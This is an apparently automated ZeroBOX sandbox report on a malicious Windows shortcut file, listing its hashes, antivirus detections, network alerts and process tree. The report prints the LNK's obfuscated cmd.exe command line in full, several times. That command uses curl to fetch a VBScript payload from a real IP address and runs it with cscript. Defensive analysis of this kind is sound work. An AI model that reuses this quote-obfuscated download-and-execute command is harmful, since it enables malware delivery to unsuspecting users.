Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 26, 2023, 9:26 a.m.	Sept. 26, 2023, 9:28 a.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Mon Sep 25 01:58:32 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`86b6cf70293cde65ebf86dce611acd51`
SHA256	`2032c7c9fe74334d76bebd34dc9183eef730d942344c1845c9dc509742897c28`
CRC32	`BFF9ED7A`
ssdeep	`24:8ahWJCnecYZA8vlV+/JlGqcFBx/i850MOZtm:8aXJ0lqlGTFXyr`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "djoMrZ" C:\Users\test22\AppData\Local\Temp\5vy.lnk.lnk
2560
- cmd.exe "C:\Windows\System32\cmd.exe" /c gy || ECHo gy & p"IN"g gy || cu"R"L h"ttp"://8"8."1"1"9"."1"75"."2"4"5/WNJD1"/5"vy" -o C:\Users\test22\AppData\Local\Temp\gy.vbs & p"IN"g -n 2 gy || Cs"c"R"I"P"t" C:\Users\test22\AppData\Local\Temp\gy.vbs & Ex"I"T 'huJqJROyhAXLNl
  2672
  - PING.EXE p"IN"g gy
    2760
  - curl.exe cu"R"L h"ttp"://8"8."1"1"9"."1"75"."2"4"5/WNJD1"/5"vy" -o C:\Users\test22\AppData\Local\Temp\gy.vbs
    2828
  - PING.EXE p"IN"g -n 2 gy
    2884
  - cscript.exe Cs"c"R"I"P"t" C:\Users\test22\AppData\Local\Temp\gy.vbs
    2932

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
88.119.175.245	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49166 -> 88.119.175.245:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.101:49166 -> 88.119.175.245:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 26, 2023, 9:26 a.m.	buffer: 'gy' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 26, 2023, 9:26 a.m.	buffer: gy console_handle: 0x00000007	1	1
WriteConsoleW Sept. 26, 2023, 9:26 a.m.	buffer: 'Ex"I"T' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA Sept. 26, 2023, 9:26 a.m.	buffer: Ping request could not find host gy. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Sept. 26, 2023, 9:26 a.m.	buffer: Ping request could not find host gy. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 26, 2023, 9:26 a.m.	buffer: Microsoft (R) Windows Script Host 버전 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. console_handle: 0x00000007	1	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://88.119.175.245/WNJD1/5vy

Performs some HTTP requests (1 event)

request

GET http://88.119.175.245/WNJD1/5vy

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 26, 2023, 9:26 a.m.	process_identifier: 2932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732f2000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\5vy.lnk.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c gy || ECHo gy & p"IN"g gy || cu"R"L h"ttp"://8"8."1"1"9"."1"75"."2"4"5/WNJD1"/5"vy" -o C:\Users\test22\AppData\Local\Temp\gy.vbs & p"IN"g -n 2 gy || Cs"c"R"I"P"t" C:\Users\test22\AppData\Local\Temp\gy.vbs & Ex"I"T 'huJqJROyhAXLNl

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

Sangfor	Trojan.Generic-LNK.Save.09ac0d59
F-Secure	Trojan:W32/LnkGet.Q
Sophos	Troj/LnkObf-V
Google	Detected
Zoner	Probably Heur.LNKScript
SentinelOne	Static AI - Suspicious LNK
Panda	Trj/Ghostcript.A

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

88.119.175.245

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2560 resumed a thread in remote process 2672
NtResumeThread Sept. 26, 2023, 9:26 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2672	1	0	0

5vy.lnk.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All